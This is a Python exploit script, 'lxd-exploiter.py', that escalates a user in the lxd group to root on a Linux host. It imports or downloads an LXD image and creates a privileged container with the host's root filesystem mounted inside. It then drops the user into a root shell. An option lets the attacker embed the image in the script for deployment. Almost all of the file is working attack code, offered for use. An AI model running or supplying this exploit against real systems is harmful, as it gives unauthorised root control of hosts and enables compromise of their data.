lxd-exploiter.py

#!/usr/bin/python3
import os
import argparse
import requests
import subprocess
import sys
from base64 import b64encode, b64decode


print('''


                      ██▓    ▒██   ██▒▓█████▄                          
                     ▓██▒    ▒▒ █ █ ▒░▒██▀ ██▌                         
                     ▒██░    ░░  █   ░░██   █▌                         
                     ▒██░     ░ █ █ ▒ ░▓█▄   ▌                         
                     ░██████▒▒██▒ ▒██▒░▒████▓                          
                     ░ ▒░▓  ░▒▒ ░ ░▓ ░ ▒▒▓  ▒                          
                     ░ ░ ▒  ░░░   ░▒ ░ ░ ▒  ▒                          
                       ░ ░    ░    ░   ░ ░  ░                          
                         ░  ░ ░    ░     ░                             
                                       ░                               
▓█████ ▒██   ██▒ ██▓███   ██▓     ▒█████   ██▓▄▄▄█████▓▓█████  ██▀███  
▓█   ▀ ▒▒ █ █ ▒░▓██░  ██▒▓██▒    ▒██▒  ██▒▓██▒▓  ██▒ ▓▒▓█   ▀ ▓██ ▒ ██▒
▒███   ░░  █   ░▓██░ ██▓▒▒██░    ▒██░  ██▒▒██▒▒ ▓██░ ▒░▒███   ▓██ ░▄█ ▒
▒▓█  ▄  ░ █ █ ▒ ▒██▄█▓▒ ▒▒██░    ▒██   ██░░██░░ ▓██▓ ░ ▒▓█  ▄ ▒██▀▀█▄  
░▒████▒▒██▒ ▒██▒▒██▒ ░  ░░██████▒░ ████▓▒░░██░  ▒██▒ ░ ░▒████▒░██▓ ▒██▒
░░ ▒░ ░▒▒ ░ ░▓ ░▒▓▒░ ░  ░░ ▒░▓  ░░ ▒░▒░▒░ ░▓    ▒ ░░   ░░ ▒░ ░░ ▒▓ ░▒▓░
 ░ ░  ░░░   ░▒ ░░▒ ░     ░ ░ ▒  ░  ░ ▒ ▒░  ▒ ░    ░     ░ ░  ░  ░▒ ░ ▒░
   ░    ░    ░  ░░         ░ ░   ░ ░ ░ ▒   ▒ ░  ░         ░     ░░   ░ 
   ░  ░ ░    ░               ░  ░    ░ ░   ░              ░  ░   ░     
                                                       BY: KimSchulz                                                                       

''') 


EMBEDTAG = b'#~'
#bytes_out = sys.argv[0]

def slicer(length, source):
    "Iterate over slices of given length from source"
    start = 0
    stop = length
    while start < len(source):
        yield source[start:stop]
        start = stop
        stop += length

def arm_script(filename, dest):
    "embed data into the end of this script"
    with open(filename, 'rb') as source:
        rawdata = source.read()
        encoded = b64encode(rawdata)
        with open(dest, 'ab') as script:
            for section in slicer(64, encoded):
                script.write(EMBEDTAG)
                script.write(section)
                script.write(b'\n')

def extract_image(dest):
    lines = 0
    "Read embedded data from this script and write to dest"
    script = os.path.abspath(sys.argv[0])
    with open(dest, 'wb') as image:
        with open(script, 'rb') as source:
            for line in source:
                if not line.startswith(EMBEDTAG):
                    continue
                image.write(b64decode(line[len(EMBEDTAG):-1]))
                lines += 1
    return lines

def exploit():
    #start exploiting
    print(''' 
╦  ┌─┐┌┬┐  ┌┬┐┬ ┬┌─┐  ┌─┐─┐ ┬┌─┐┬  ┌─┐┬┌┬┐┬┌┐┌┌─┐  ┌┐ ┌─┐┌─┐┬┌┐┌   
║  ├┤  │    │ ├─┤├┤   ├┤ ┌┴┬┘├─┘│  │ ││ │ │││││ ┬  ├┴┐├┤ │ ┬││││   
╩═╝└─┘ ┴    ┴ ┴ ┴└─┘  └─┘┴ └─┴  ┴─┘└─┘┴ ┴ ┴┘└┘└─┘  └─┘└─┘└─┘┴┘└┘ooo
    ''')
    print('Import image...', end='')
    cmd = 'lxc image import {} --alias privescimg'.format(filename)
    print('Done!')
    try:
        out = subprocess.check_output(cmd, shell=True)
    except subprocess.CalledProcessError as e:
        print(e.output)
    
    print('Init new image...', end='')
    try:
        out = subprocess.check_output('echo "config: {}\nnetworks:\n- config:\n    ipv4.address: auto\n    ipv6.address: auto\n  description: \"\"\n  managed: false\n  name: lxdbr1\n  type: \"\"\nstorage_pools:\n- config:\n  name: default2\n  driver: dir\nprofiles:\ncluster: null" > conf.yaml', shell=True)
    except subprocess.CalledProcessError as e:
        print(e.output)
    print('Done!')
    try:
        out = subprocess.check_output('cat conf.yaml|lxd init --preseed', shell=True)
        out = subprocess.check_output('lxc init privescimg privesc -c security.privileged=true', shell=True)
    except subprocess.CalledProcessError as e:
        print(e.output)
    print('Config image with mount path {}...'.format(mount), end='')
    
    try:
        out = subprocess.check_output('lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true', shell=True)
    except subprocess.CalledProcessError as e:
        print(e.output)
    print('Done!')
    
    print('Staring image...', end='')
    try:
        out = subprocess.check_output('lxc start privesc', shell=True)
    except subprocess.CalledProcessError as e:
        print(e.output)
    print('Done!')
    print('''
(  _ \(  _  )(  _  )(_  _)  / __)( )_( )( ___)(  )  (  )   O 
 )   / )(_)(  )(_)(   )(    \__ \ ) _ (  )__)  )(__  )(__ 
(_)\_)(_____)(_____) (__)   (___/(_) (_)(____)(____)(____) O
    ''')
    print('Let\'s go have fun with your brand new root shell - enjoy!')
    try:
        subprocess.call('lxc exec privesc /bin/sh', shell=True)
    except subprocess.CalledProcessError as e:
        print(e.output)

def cleanup():
    print('Cleaning up...', end='')
    try:
        subprocess.call('rm -rf conf.yaml', shell=True)
        subprocess.call('lxc stop privesc', shell=True)
        subprocess.call('lxc delete privesc', shell=True)
        subprocess.call('lxc image delete privescimg', shell=True)
    except subprocess.CalledProcessError as e:
        print(e.output)
    print('Done!')



#######################################################################################
#  MAIN
#######################################################################################
if __name__ == '__main__':
    imageFile = ''
    mount = '/mnt/root'
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', action='store',help='url where the image should be fetches')
    parser.add_argument('-i', '--image', action='store', help='image name if existing image is to be used')
    parser.add_argument('-m', '--mount', action='store', help='path to use for mount point')
    parser.add_argument('-a', '--arm', action='store', help='arm this script by embedding an LXD image for later retrieval')


    args = parser.parse_args()

# should we arm this script by embedding an image?
    if args.arm != None:
        print('Embedding {} into this script...'.format(args.arm), end='')
        arm_script(args.arm, sys.argv[0])
        print('Done!\nNow this script is armed and ready for deployment')
        exit()

# check if user is in lxd group 
    groups = subprocess.check_output('groups', shell=True)
    if not 'lxd' in groups.decode("utf-8"):
        print('User is not in lxd group - no need to continue')
        exit()

# user wants to use image from external url
    if args.url != None:
        print('Getting image ', end='')
        imageFile = requests.get(args.url, allow_redirects=True)
        if args.url.find('/'):
            filename = args.url.rsplit('/', 1)[1]
            print(filename + '...', end='')
            open(filename, 'wb').write(imageFile.content)
        print('Done!') 
# user wants to use a local image file
    elif args.image != None:
        filename = args.image;
        print("Using image "+filename)
# use will use an embedded image 
    else:
        lines = extract_image('image.tar.gz');
        if lines == 0:
            print('Did not find an embedded image - exiting')
            exit()
        filename = "image.tar.gz" 
    if(args.mount != None):
        mount = args.mount
        print('mount '+mount)
    
    exploit()


################################ EMBED BELOW #########################################